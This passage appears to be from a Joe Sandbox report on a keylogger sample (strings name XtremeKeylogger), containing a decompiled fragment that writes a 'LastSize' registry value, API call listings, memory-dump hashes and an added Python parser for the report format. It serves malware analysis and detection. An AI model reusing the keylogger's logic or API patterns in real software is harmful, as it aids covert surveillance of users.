                  							_push(E1000390C(_t26));
                  							_t28 =  *0x1000f6b0; // 0x0
                  							_push(E1000390C(_t28));
                  							_t61 =  *0x1000f684; // 0x0
                  							E10003988( &_v12, 0x100093a0, _t61, _t75);
                  							_push(E1000390C(_v12));
                  							_t55 =  *0x1000f6a8; // 0x0
                  							E10003988( &_v16, _t55, 0x100093ac, _t75);
                  							_push(E1000390C(_v16));
                  							_t38 =  *0x1000f6a4; // 0x0
                  							_t39 = E1000390C(_t38);
                  							_pop(_t63);
                  							_pop(_t56);
                  							if(E10008DA4(_t39, _t51, _t56, _t63, 0x1000e0b8, 0x1000f6bc) != 0 &&  *0x1000f6c0 == 1) {
                  								_t78 =  *0x1000f6c1 - 1;
                  								if( *0x1000f6c1 == 1) {
                  									_push(0);
                  									_push(0);
                  									_push(0);
                  									_push( *0x1000e0b8);
                  									L10004F38();
                  									_push( *0x1000e0b8);
                  									L10004F18();
                  									 *0x1000f6c4 = 0;
                  									 *0x1000f6c8 = 0;
                  									E10006710( &_v20, _t56, _t63,  *0x1000f6c4,  *0x1000f6c8);
                  									_t57 =  *0x1000f6b4; // 0x0
                  									E10003988( &_v24, _t57, L"SOFTWARE\\", _t78);
                  									E1000577C(0x80000001, _t51, L"LastSize", _v24, 0x1000f6bc, _t78, 2, _v20);
                  								}
                  							}
                  						}
                  						continue;
                  					}
                  				}
                   			}

                  Strings
                  Memory Dump Source
                  • Source File: 00000001.00000002.304130740.0000000010000000.00000040.00000001.sdmp, Offset: 10000000, based on PE: true
                  Yara matches
                  Similarity
                  • API ID:
                  • String ID: .html$FTP$LastSize$SOFTWARE\
                  • API String ID: 0-3487691436
                  • Opcode ID: f64d9703497d1778a1f724dcd6172282dd11fce0a9d43a36a9a9269ada9e7162
                  • Instruction ID: 1ef3a85e4ac3c80801a06b688fa0acd6d065186ae52865efd5065228073e7574
                  • Opcode Fuzzy Hash: f64d9703497d1778a1f724dcd6172282dd11fce0a9d43a36a9a9269ada9e7162
                  • Instruction Fuzzy Hash: 9F317078500145BFF705DB64CD81BAF77ADEB453C0F904129F440AB6BACBB2AD509B61
                  Uniqueness

                  Uniqueness Score: -1.00%
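
The stanzas above and below (an API line with its ref address, a Source File line naming the memory dump, the API ID / String ID / Opcode ID fields and a closing Uniqueness Score) repeat for every function in the report. The following Python is added here as an example and is not part of the Joe Sandbox report: it parses that layout into records and summarises, per process dump, which APIs are called from which addresses and which strings the disassembler resolved. SAMPLE is a constructed excerpt copied from stanzas on this page and shortened to the lines the parser reads (fuzzy-hash lines dropped); reading the first dotted field of the .sdmp file name as the analysis process index is this example's assumption about Joe Sandbox naming, not something the report states.

```python
"""Structured parse of the per-function stanzas in a Joe Sandbox report
(the 'APIs / Strings / Source File / Similarity / Uniqueness' blocks that
fill this page), summarised per process dump.

Added example, not report output. SAMPLE is a constructed excerpt built
from stanzas on this page, shortened to the lines this parser reads.
Assumption: the first dotted field of the .sdmp name is the analysis
process index (00000001, 00000004, 00000008 on this page)."""
import re
from collections import defaultdict

SAMPLE = r"""Strings
• Source File: 00000001.00000002.304130740.0000000010000000.00000040.00000001.sdmp, Offset: 10000000, based on PE: true
• API ID:
• String ID: LastSize$SOFTWARE\$XtremeKeylogger$qualquercoisarsrsr
• API String ID: 0-193067991
• Opcode ID: b8b35e645ddaf236c2101e74a19ca3d57dbe3ac871cbe1f58d3791964739a7a7
Uniqueness Score: -1.00%

Executed Functions

APIs
• CreateMutexW.KERNELBASE(?,?), ref: 008BA689
• Source File: 00000004.00000002.301963762.00000000008BA000.00000040.00000001.sdmp, Offset: 008BA000, based on PE: false
• API ID: CreateMutex
• String ID:
• API String ID: 1964310414-0
• Opcode ID: b817aa69b76b77a1dca300a8b3d9cdb3ca7cf615f3311f8d36742270a68d02c0
Uniqueness Score: -1.00%

APIs
• CreateMutexW.KERNELBASE(?,?), ref: 008BA689
• Source File: 00000004.00000002.301963762.00000000008BA000.00000040.00000001.sdmp, Offset: 008BA000, based on PE: false
• API ID: CreateMutex
• String ID:
• API String ID: 1964310414-0
• Opcode ID: 157274d56c7534221f10e0c7e18992e8f17c1077c32aee9d4990b60a30a191df
Uniqueness Score: -1.00%

APIs
• NtQuerySystemInformation.NTDLL ref: 04C01DAD
• Source File: 00000008.00000002.560873604.0000000004C00000.00000040.00000001.sdmp, Offset: 04C00000, based on PE: false
• API ID: InformationQuerySystem
• String ID:
• API String ID: 3562636166-0
• Opcode ID: 39961bb48a97050817dc14468387645530951b37ef13cabb7a5f13a8c6e85687
Uniqueness Score: -1.00%
"""

API_RE = re.compile(r"^• (\w+)\.(\w+)(?:\((.*?)\),)? ref: ([0-9A-Fa-f]+)$")  # args are optional (NTDLL line)
SRC_RE = re.compile(r"^• Source File: (\S+), Offset: ([0-9A-Fa-f]+), based on PE: (true|false)$")
FIELD_RE = re.compile(r"^• (API ID|String ID|API String ID|Opcode ID|Instruction ID):\s?(.*)$")
SCORE_RE = re.compile(r"^Uniqueness Score: (-?[0-9.]+)%$")
SECTIONS = {"Executed Functions": True, "Non-executed Functions": False}

def parse_records(text):
    """One dict per stanza; a stanza ends at its 'Uniqueness Score' line."""
    records, cur, executed = [], {"apis": []}, None
    for raw in text.splitlines():
        line = raw.strip()
        if line in SECTIONS:                      # section header applies to the stanzas that follow
            executed = SECTIONS[line]
        elif m := API_RE.match(line):
            cur["apis"].append({"name": m[1], "module": m[2], "args": m[3], "ref": m[4]})
        elif m := SRC_RE.match(line):
            fields = m[1].split(".")
            cur.update(source=m[1], offset=m[2], based_on_pe=m[3] == "true",
                       process=fields[0], base=fields[3])  # assumption: field 0 = process index
        elif m := FIELD_RE.match(line):
            key = m[1].lower().replace(" ", "_")
            cur[key] = [s for s in m[2].split("$") if s] if key == "string_id" else m[2]  # '$'-joined list
        elif m := SCORE_RE.match(line):
            cur.update(uniqueness=float(m[1]), executed=executed)
            records.append(cur)
            cur = {"apis": []}
    return records

def summarise(records):
    """Per process index: API name -> distinct call-site refs, strings seen, dumps involved."""
    out = defaultdict(lambda: {"apis": defaultdict(set), "strings": set(), "dumps": set()})
    for r in records:
        p = out[r.get("process", "?")]
        p["dumps"].add(r.get("source"))
        p["strings"].update(r.get("string_id", []))
        for a in r["apis"]:
            p["apis"][a["name"]].add(a["ref"])
    return out

def shared_call_sites(records):
    """Refs listed under more than one function stanza (same call site, several
    listed functions): count the API once when turning the report into indicators."""
    seen = defaultdict(set)
    for r in records:
        for a in r["apis"]:
            seen[a["ref"]].add(r.get("opcode_id"))
    return {ref: sorted(ids) for ref, ids in seen.items() if len(ids) > 1}

if __name__ == "__main__":
    recs = parse_records(SAMPLE)
    for proc, info in sorted(summarise(recs).items()):
        print(proc, dict(info["apis"]), sorted(info["strings"]))
    print("shared call sites:", shared_call_sites(recs))
```

Running it prints, per process index, the API names with their call-site addresses and the resolved strings (process 00000001 carries the XtremeKeylogger / LastSize / SOFTWARE\ strings from the decompiled functions above, process 00000004 the CreateMutexW call, process 00000008 the NtQuerySystemInformation call). shared_call_sites reports 008BA689, which this page lists under two CreateMutexW functions, so an indicator list built from the report does not count that call twice.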

                  Executed Functions

                  APIs
                  • CreateMutexW.KERNELBASE(?,?), ref: 008BA689
                  Memory Dump Source
                  • Source File: 00000004.00000002.301963762.00000000008BA000.00000040.00000001.sdmp, Offset: 008BA000, based on PE: false
                  Similarity
                  • API ID: CreateMutex
                  • String ID:
                  • API String ID: 1964310414-0
                  • Opcode ID: b817aa69b76b77a1dca300a8b3d9cdb3ca7cf615f3311f8d36742270a68d02c0
                  • Instruction ID: c3af8f443979c11572d1adcb3b4a3a0357563cfff72f62deb534c936ed976e9e
                  • Opcode Fuzzy Hash: b817aa69b76b77a1dca300a8b3d9cdb3ca7cf615f3311f8d36742270a68d02c0
                  • Instruction Fuzzy Hash: 5531A6B15093806FE712CB25CC45B96FFA8EF06310F08849AE984CB252D365E904C762
                  Uniqueness

                  Uniqueness Score: -1.00%

                  APIs
                  • CreateMutexW.KERNELBASE(?,?), ref: 008BA689
                  Memory Dump Source
                  • Source File: 00000004.00000002.301963762.00000000008BA000.00000040.00000001.sdmp, Offset: 008BA000, based on PE: false
                  Similarity
                  • API ID: CreateMutex
                  • String ID:
                  • API String ID: 1964310414-0
                  • Opcode ID: 157274d56c7534221f10e0c7e18992e8f17c1077c32aee9d4990b60a30a191df
                  • Instruction ID: 5347a6aee4220ae41c56069cb557db85079015a62eea841d6d8b671716ed687c
                  • Opcode Fuzzy Hash: 157274d56c7534221f10e0c7e18992e8f17c1077c32aee9d4990b60a30a191df
                  • Instruction Fuzzy Hash: 412180B1504244AFE721DF29CD85BA6FBE8EF15310F18846AED85CB342D671E904CB66
                  Uniqueness

                  Uniqueness Score: -1.00%

                  APIs
                  • CopyFileW.KERNELBASE(?,?,?), ref: 008BA8F2
                  Memory Dump Source
                  • Source File: 00000004.00000002.301963762.00000000008BA000.00000040.00000001.sdmp, Offset: 008BA000, based on PE: false
                  Similarity
                  • API ID: CopyFile
                  • String ID:
                  • API String ID: 1304948518-0
                  • Opcode ID: 71513a6606217a6db5e36412f0fcbe74028ab8977fc6fa62e0794b9713d254bd
                  • Instruction ID: 94115f8146503a1240d2ccc9d9d84193fb1ee3f9cc515638bff132f8cd62edfb
                  • Opcode Fuzzy Hash: 71513a6606217a6db5e36412f0fcbe74028ab8977fc6fa62e0794b9713d254bd
                  • Instruction Fuzzy Hash: 8F2190B25093809FD712CB25DC40B92BFA8FF16210F0984AAE984CB263D2249909CB62
                  Uniqueness

                  Uniqueness Score: -1.00%

                  APIs
                  • SetErrorMode.KERNELBASE(?), ref: 008BA330
                  Memory Dump Source
                  • Source File: 00000004.00000002.301963762.00000000008BA000.00000040.00000001.sdmp, Offset: 008BA000, based on PE: false
                  Similarity
                  • API ID: ErrorMode
                  • String ID:
                  • API String ID: 2340568224-0
                  • Opcode ID: 799e955aab00f288a90dd4ad75f8ea71f9d49c145e5f3a7660c5897fb2bca57c
                  • Instruction ID: d59e1ceba1e4229707b209dbd1c895682a81d9151773fdcee6ede6a359f710e2
                  • Opcode Fuzzy Hash: 799e955aab00f288a90dd4ad75f8ea71f9d49c145e5f3a7660c5897fb2bca57c
                  • Instruction Fuzzy Hash: 3A21297140E3C09FD7238B259C54A52BFB4EF07624F0980DBDD84CF2A3D269A808DB62
                  Uniqueness

                  Uniqueness Score: -1.00%

                  APIs
                  • CopyFileW.KERNELBASE(?,?,?), ref: 008BA8F2
                  Memory Dump Source
                  • Source File: 00000004.00000002.301963762.00000000008BA000.00000040.00000001.sdmp, Offset: 008BA000, based on PE: false
                  Similarity
                  • API ID: CopyFile
                  • String ID:
                  • API String ID: 1304948518-0
                  • Opcode ID: 4edbe60a8cd61c31e3419fbab754631943de4ebfa8389259ab040e553f6ca677
                  • Instruction ID: 1f6e59174eda2fcd9e5ac7402a1a6059f7efc15ab3b43512c1c9ef963a421378
                  • Opcode Fuzzy Hash: 4edbe60a8cd61c31e3419fbab754631943de4ebfa8389259ab040e553f6ca677
                  • Instruction Fuzzy Hash: BD1170715002448FDB25CF29D9847A6FBE8FF14720F08C46ADD59CB742D234D404DB62
                  Uniqueness

                  Uniqueness Score: -1.00%

                  APIs
                  • SetErrorMode.KERNELBASE(?), ref: 008BA330
                  Memory Dump Source
                  • Source File: 00000004.00000002.301963762.00000000008BA000.00000040.00000001.sdmp, Offset: 008BA000, based on PE: false
                  Similarity
                  • API ID: ErrorMode
                  • String ID:
                  • API String ID: 2340568224-0
                  • Opcode ID: 50075748f7b0f79d2a2523917368809ba0b7daeba0f5622607cf6f00e8a4c5ea
                  • Instruction ID: 6f7524869546358767543dc12fc931e6f6bf584e670cf40cd7808b1dfd70ab6d
                  • Opcode Fuzzy Hash: 50075748f7b0f79d2a2523917368809ba0b7daeba0f5622607cf6f00e8a4c5ea
                  • Instruction Fuzzy Hash: F9F0AF35804284CFDB21CF19D9887A5FFE4EF08725F58C09ADD498B316D275A408CAA3
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Memory Dump Source
                  • Source File: 00000004.00000002.302076099.0000000002490000.00000040.00000001.sdmp, Offset: 02490000, based on PE: false
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: eec9d5e3a6ec2117a67cf76d84e4df3f44438fa45788fd476b599bf8b9b5e83a
                  • Instruction ID: e56b273c980af843b70bfc326ddfe4bd584d8de6578771e2bbb5d527dd7a641f
                  • Opcode Fuzzy Hash: eec9d5e3a6ec2117a67cf76d84e4df3f44438fa45788fd476b599bf8b9b5e83a
                  • Instruction Fuzzy Hash: 3D12D330700A41CFEB19EB78D458A6D37E7BB88304F1548A9D9069B3A9EF799C42CB51
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Memory Dump Source
                  • Source File: 00000004.00000002.302076099.0000000002490000.00000040.00000001.sdmp, Offset: 02490000, based on PE: false
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: b05ede2949027fe481533d5eacc8994930fa36f430a358632eeb50465d2163ce
                  • Instruction ID: 83e33327482631ef3770c3fed056aa2873b00185d4002bf75ac6653d2f9861e4
                  • Opcode Fuzzy Hash: b05ede2949027fe481533d5eacc8994930fa36f430a358632eeb50465d2163ce
                  • Instruction Fuzzy Hash: 7EB1A034700A00CFEB19EB78D458A6E77F6BB88755F1544A9D8029B3A9DF369C42CB50
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Memory Dump Source
                  • Source File: 00000004.00000002.302076099.0000000002490000.00000040.00000001.sdmp, Offset: 02490000, based on PE: false
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: f1c57813d280f301b1fa1da8c582261d52f053c83c084eb76843eaeccf78cc98
                  • Instruction ID: b5f4438ccc58e418efd9ab771813966300fabcb46e9fd04eaa162f0dece9cb97
                  • Opcode Fuzzy Hash: f1c57813d280f301b1fa1da8c582261d52f053c83c084eb76843eaeccf78cc98
                  • Instruction Fuzzy Hash: EE919134700E10CFEB19EB78E458A6D77E3BB88745B1544A9D802DB3A9DF3A9C42CB51
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Memory Dump Source
                  • Source File: 00000004.00000002.302076099.0000000002490000.00000040.00000001.sdmp, Offset: 02490000, based on PE: false
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 2cba0061439fe6512614b87802ea336e32b42cdf8093e6202dc29f10c21a5843
                  • Instruction ID: 6088c7c5d2e8214a11c2c98935a180bdc8f2cfb4f770b3056033020309bd397d
                  • Opcode Fuzzy Hash: 2cba0061439fe6512614b87802ea336e32b42cdf8093e6202dc29f10c21a5843
                  • Instruction Fuzzy Hash: 4691B334700E01CFEB19EB78E458A6D77E3BB88745B1544A9D802EB3A9DF399C42CB50
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Memory Dump Source
                  • Source File: 00000004.00000002.302076099.0000000002490000.00000040.00000001.sdmp, Offset: 02490000, based on PE: false
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: cf69f51953dbd37165f81e25d1677fe4e6322137a34b31ed2b355fd52587b543
                  • Instruction ID: cae41a1b0da4907c85ce016694e7ab5fa2ae6aad150ffd08a6eacef310a9adbf
                  • Opcode Fuzzy Hash: cf69f51953dbd37165f81e25d1677fe4e6322137a34b31ed2b355fd52587b543
                  • Instruction Fuzzy Hash: 31819234700E00CFEB15EB78E458A6D77E3BB88745B1544A9D902DB3A9DF3A9C42CB51
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Memory Dump Source
                  • Source File: 00000004.00000002.302076099.0000000002490000.00000040.00000001.sdmp, Offset: 02490000, based on PE: false
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 6ed19e04d83459c296dad1a08a407d6c753c853b561b8c5e9e860abc37b92dfb
                  • Instruction ID: 4e0aa40d78c0667c7e3adbea1f42ca913d0d1b31710d9f58da8276dcd5b9698d
                  • Opcode Fuzzy Hash: 6ed19e04d83459c296dad1a08a407d6c753c853b561b8c5e9e860abc37b92dfb
                  • Instruction Fuzzy Hash: FF515B30519EC68FD307EB78EA958893FB1FF82304B1588DAD0448B26BDB345D0ADB52
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Memory Dump Source
                  • Source File: 00000004.00000002.302087256.0000000002550000.00000040.00000040.sdmp, Offset: 02550000, based on PE: false
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: e4e05f7f025a4534d75678373789e195ab22be4e6c87d3d80df34852c762110e
                  • Instruction ID: 49afb218cc76bd9ba978b5199a6baf27713590a72343664262e4a70ec9ef465a
                  • Opcode Fuzzy Hash: e4e05f7f025a4534d75678373789e195ab22be4e6c87d3d80df34852c762110e
                  • Instruction Fuzzy Hash: 6501D6B250D3846FD7128B16DD40C62FFA8EF86620709C0DBEC898B612D125B905CBB2
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Memory Dump Source
                  • Source File: 00000004.00000002.302087256.0000000002550000.00000040.00000040.sdmp, Offset: 02550000, based on PE: false
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 25a0557e46c3135e510ff319c2bb30e50f83ec171c7355a9e2fbc1d8b28a98d6
                  • Instruction ID: 609c9d03118dd8b6901d517e696feb26d433626e042ffa247e7c2c77853554fa
                  • Opcode Fuzzy Hash: 25a0557e46c3135e510ff319c2bb30e50f83ec171c7355a9e2fbc1d8b28a98d6
                  • Instruction Fuzzy Hash: 50E09276A446008BD650CF0AED41852FBD8EB84631718C07FDC0D8B701E535B505CFA6
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Memory Dump Source
                  • Source File: 00000004.00000002.301959278.00000000008B2000.00000040.00000001.sdmp, Offset: 008B2000, based on PE: false
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: c37f310b48543a2c6e60bada7ae4168977848c84b492567e53241e8e61f85024
                  • Instruction ID: 4e4cb55648ca92b869fb50fcfa98e51632fbdc6abb93c6caceb8b279f28ba437
                  • Opcode Fuzzy Hash: c37f310b48543a2c6e60bada7ae4168977848c84b492567e53241e8e61f85024
                  • Instruction Fuzzy Hash: C9D05E79205AC14FD326CA1CC2A8BD63F94FF51B05F4644F9E800CBB63C368D981D200
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Memory Dump Source
                  • Source File: 00000004.00000002.301959278.00000000008B2000.00000040.00000001.sdmp, Offset: 008B2000, based on PE: false
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 2646a011e0be6cf3f901810c15c6af6f5874733e687dc6eaf74ccfc3717570e5
                  • Instruction ID: 062bc3de941f73849732e9a0ea8ecefdbc5e89839d4863e8771311b7813bbf66
                  • Opcode Fuzzy Hash: 2646a011e0be6cf3f901810c15c6af6f5874733e687dc6eaf74ccfc3717570e5
                  • Instruction Fuzzy Hash: 11D05E342002814BC726DB0CC698F9937D4FB45B00F0644E8AC00CB372C7B9DCC1C600
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Non-executed Functions

                  Executed Functions

                  APIs
                  • NtQuerySystemInformation.NTDLL ref: 04C01DAD
                  Memory Dump Source
                  • Source File: 00000008.00000002.560873604.0000000004C00000.00000040.00000001.sdmp, Offset: 04C00000, based on PE: false
                  Strings
                  Memory Dump Source
                  • Source File: 00000008.00000002.560846130.0000000004BA0000.00000040.00000001.sdmp, Offset: 04BA0000, based on PE: false
                  Similarity
                  • String ID: X1q$X1q$X1q

                  APIs
                  • RegQueryValueExW.KERNELBASE(?,00000E2C,?,?), ref: 04C00B5E
                  Memory Dump Source
                  • Source File: 00000008.00000002.560873604.0000000004C00000.00000040.00000001.sdmp, Offset: 04C00000, based on PE: false
                  APIs
                  • getaddrinfo.WS2_32(?,00000E2C), ref: 04C0178B
                  Memory Dump Source
                  • Source File: 00000008.00000002.560873604.0000000004C00000.00000040.00000001.sdmp, Offset: 04C00000, based on PE: false
                  APIs
                  • ConvertStringSecurityDescriptorToSecurityDescriptorW.ADVAPI32(?,00000E2C), ref: 04C01047
                  Memory Dump Source
                  • Source File: 00000008.00000002.560873604.0000000004C00000.00000040.00000001.sdmp, Offset: 04C00000, based on PE: false
                  APIs
                  Memory Dump Source
                  • Source File: 00000008.00000002.560873604.0000000004C00000.00000040.00000001.sdmp, Offset: 04C00000, based on PE: false
                  Similarity
                  • API ID: FileView
                  APIs
                  • FormatMessageW.KERNELBASE(?,00000E2C,?,?), ref: 04C01946
                  Memory Dump Source
                  • Source File: 00000008.00000002.560873604.0000000004C00000.00000040.00000001.sdmp, Offset: 04C00000, based on PE: false
                  APIs
                  • GetProcessTimes.KERNELBASE(?,00000E2C,89BB9157,00000000,00000000,00000000,00000000), ref: 04C01659
                  Memory Dump Source
                  • Source File: 00000008.00000002.560873604.0000000004C00000.00000040.00000001.sdmp, Offset: 04C00000, based on PE: false
                  APIs
                  • OpenFileMappingW.KERNELBASE(?,?), ref: 04C011F1
                  Memory Dump Source
                  • Source File: 00000008.00000002.560873604.0000000004C00000.00000040.00000001.sdmp, Offset: 04C00000, based on PE: false
                  APIs
                  • WSASocketW.WS2_32(?,?,?,?,?), ref: 04C00C16
                  Memory Dump Source
                  • Source File: 00000008.00000002.560873604.0000000004C00000.00000040.00000001.sdmp, Offset: 04C00000, based on PE: false
                  APIs
                  • RegQueryValueExW.KERNELBASE(?,00000E2C,89BB9157,00000000,00000000,00000000,00000000), ref: 04C00F5C
                  Memory Dump Source
                  • Source File: 00000008.00000002.560873604.0000000004C00000.00000040.00000001.sdmp, Offset: 04C00000, based on PE: false
                  APIs
                  • ReadFile.KERNELBASE(?,00000E2C,89BB9157,00000000,00000000,00000000,00000000), ref: 04C009A1
                  Memory Dump Source
                  • Source File: 00000008.00000002.560873604.0000000004C00000.00000040.00000001.sdmp, Offset: 04C00000, based on PE: false
                  APIs
                  • K32EnumProcesses.KERNEL32(?,?,?,89BB9157,00000000,?,?,?,?,?,?,?,?,72733C38), ref: 04C01CEE
                  Memory Dump Source
                  • Source File: 00000008.00000002.560873604.0000000004C00000.00000040.00000001.sdmp, Offset: 04C00000, based on PE: false
                  APIs
                  • K32EmptyWorkingSet.KERNEL32(?,?,89BB9157,00000000,?,?,?,?,?,?,?,?,72733C38), ref: 04C019D3
                  Memory Dump Source
                  • Source File: 00000008.00000002.560873604.0000000004C00000.00000040.00000001.sdmp, Offset: 04C00000, based on PE: false
                  Memory Dump Source
                  • Source File: 00000008.00000002.560846130.0000000004BA0000.00000040.00000001.sdmp, Offset: 04BA0000, based on PE: false
                  • Instruction Fuzzy Hash: AB512731708201DFD70AFB78E554A6D37A7EB88306F104968D5069F3AADF3AAC42CB51
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Memory Dump Source
                  • Source File: 00000008.00000002.560846130.0000000004BA0000.00000040.00000001.sdmp, Offset: 04BA0000, based on PE: false
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: ca9c6fa0254f0876781e51d7efbb6201523010ef0abdea5bb7262a9e1ffdc689
                  • Instruction ID: 71dc26bf86d3ff6fc9ccff558e573a15b0d2a0638f031634c6c72cf7f1603930
                  • Opcode Fuzzy Hash: ca9c6fa0254f0876781e51d7efbb6201523010ef0abdea5bb7262a9e1ffdc689
                  • Instruction Fuzzy Hash: A6513931708200DFD70AFB78E55466D37A7EB88306F104968D5069F3AADF3AAC42CB51
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Memory Dump Source
                  • Source File: 00000008.00000002.560846130.0000000004BA0000.00000040.00000001.sdmp, Offset: 04BA0000, based on PE: false
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 419b3ac17bc29be5b9efbf829b35c5f16cc977887a17c64cb609a785f8382753
                  • Instruction ID: 8d68e5ca5754c748374a219d1d4bc79f32676c48699e99178d6b0cbdd802d988
                  • Opcode Fuzzy Hash: 419b3ac17bc29be5b9efbf829b35c5f16cc977887a17c64cb609a785f8382753
                  • Instruction Fuzzy Hash: DE415E30E002098FCB55DFA8C48499DBBF2EF88324F1985A5D408EB366DB31ED55DBA4
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Memory Dump Source
                  • Source File: 00000008.00000002.560846130.0000000004BA0000.00000040.00000001.sdmp, Offset: 04BA0000, based on PE: false
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 0b80c0ae1ec246a5b2d2fa0811fd23822f1b694acb53402d2907c0ef5737b87b
                  • Instruction ID: ceddfcd5f9536c47a9df9dbd46e3c18aba3fe6c56239a9095333f54fe5f94c73
                  • Opcode Fuzzy Hash: 0b80c0ae1ec246a5b2d2fa0811fd23822f1b694acb53402d2907c0ef5737b87b
                  • Instruction Fuzzy Hash: 4B412C30E042098FCB55DF68C48899DBBF2EF88324F1985A9D405EB366DB31EC55DBA4
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Memory Dump Source
                  • Source File: 00000008.00000002.560846130.0000000004BA0000.00000040.00000001.sdmp, Offset: 04BA0000, based on PE: false
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: bc484156fbba5836a71c0e6400360e08e23efa70b16adac3fafce6ca1b1915e6
                  • Instruction ID: 802848987c26aeddac55ac6eea824df5b28517ef51b7c0dc1cb8dd19656d8bac
                  • Opcode Fuzzy Hash: bc484156fbba5836a71c0e6400360e08e23efa70b16adac3fafce6ca1b1915e6
                  • Instruction Fuzzy Hash: 80316F31708200CFD71AFB78E45466C37A7FB88346B1449A8D5069F3AADF3AAC46CB51
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Memory Dump Source
                  • Source File: 00000008.00000002.560846130.0000000004BA0000.00000040.00000001.sdmp, Offset: 04BA0000, based on PE: false
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: bee3d6f6194103e4e7403dbf6d0564063d0849febee197cf591798adef226d51
                  • Instruction ID: df2c2bae325e7fbbbdfa9eb6ebf6e38ce38322b1664931ccc19469f808e3a043
                  • Opcode Fuzzy Hash: bee3d6f6194103e4e7403dbf6d0564063d0849febee197cf591798adef226d51
                  • Instruction Fuzzy Hash: C0318170A18240CFDB49EF7DD5546AD3BE2EB8D300F948869D0029F2AAEB745C42CF91
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Memory Dump Source
                  • Source File: 00000008.00000002.560846130.0000000004BA0000.00000040.00000001.sdmp, Offset: 04BA0000, based on PE: false
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 818392a51bf3d6d3a49e6be582ac060dd2d116ef4cf88a73494bac874471f542
                  • Instruction ID: 769ec2759d54481e5fe522e19aaebff65eb904757d85ef4cd0b100ab619e7f3b
                  • Opcode Fuzzy Hash: 818392a51bf3d6d3a49e6be582ac060dd2d116ef4cf88a73494bac874471f542
                  • Instruction Fuzzy Hash: B5317030A08241CBDB49EF7DD5587AD3BF2EB88304F548869D0029F2A6DB756C41CF91
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Memory Dump Source
                  • Source File: 00000008.00000002.560846130.0000000004BA0000.00000040.00000001.sdmp, Offset: 04BA0000, based on PE: false
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 6ab080eddc96480ef42e26e6b948e0b7dadb1c55343413b81ded42b78aa3548a
                  • Instruction ID: ddf0f74b8aeb93d7c3dd491e070c88a133a4c1cf6871ef3ba43635c677b40be6
                  • Opcode Fuzzy Hash: 6ab080eddc96480ef42e26e6b948e0b7dadb1c55343413b81ded42b78aa3548a
                  • Instruction Fuzzy Hash: 24216736F081144B8BBC6EBCC4941EDF6A5EB45391F2E48AAD855E7360DA316C90CBD1
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Memory Dump Source
                  • Source File: 00000008.00000002.560846130.0000000004BA0000.00000040.00000001.sdmp, Offset: 04BA0000, based on PE: false
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: f4c242f86d9f7af538634bf26a147796cf6beea9b4f6e277382145464bce0408
                  • Instruction ID: f450099f7bb3fa8e05ac2cc0e8de3e4e632455f99d5227d0ae36c00631e42376
                  • Opcode Fuzzy Hash: f4c242f86d9f7af538634bf26a147796cf6beea9b4f6e277382145464bce0408
                  • Instruction Fuzzy Hash: CF312F30618286CBC706FF6DE68485D3BA6FB8570A7508D18A0458F2AFDB746D45CB85
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Memory Dump Source
                  • Source File: 00000008.00000002.560846130.0000000004BA0000.00000040.00000001.sdmp, Offset: 04BA0000, based on PE: false
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 56162a2fe8304706e7b96f6c8bf4c2966aa4430738a602936cc567cd82f9691e
                  • Instruction ID: b034edf2d3ea5f119873bdcb3cf90ffdc53683a0a270f83417acb8ecd0be4400
                  • Opcode Fuzzy Hash: 56162a2fe8304706e7b96f6c8bf4c2966aa4430738a602936cc567cd82f9691e
                  • Instruction Fuzzy Hash: CD219D71E141589FCB05EBB9D8949DDB7F4EF88361F400965EA52AB340EF30AD14CB90
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Memory Dump Source
                  • Source File: 00000008.00000002.560846130.0000000004BA0000.00000040.00000001.sdmp, Offset: 04BA0000, based on PE: false
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 40c1344eb07c0b8dde85e290c25be2cc730e0d5bacfe128c946cd7a74bdaf96b
                  • Instruction ID: 8dd2c359196ded02dc979b94d898f437f5f1ee819a41b7bed88c4e49b124b455
                  • Opcode Fuzzy Hash: 40c1344eb07c0b8dde85e290c25be2cc730e0d5bacfe128c946cd7a74bdaf96b
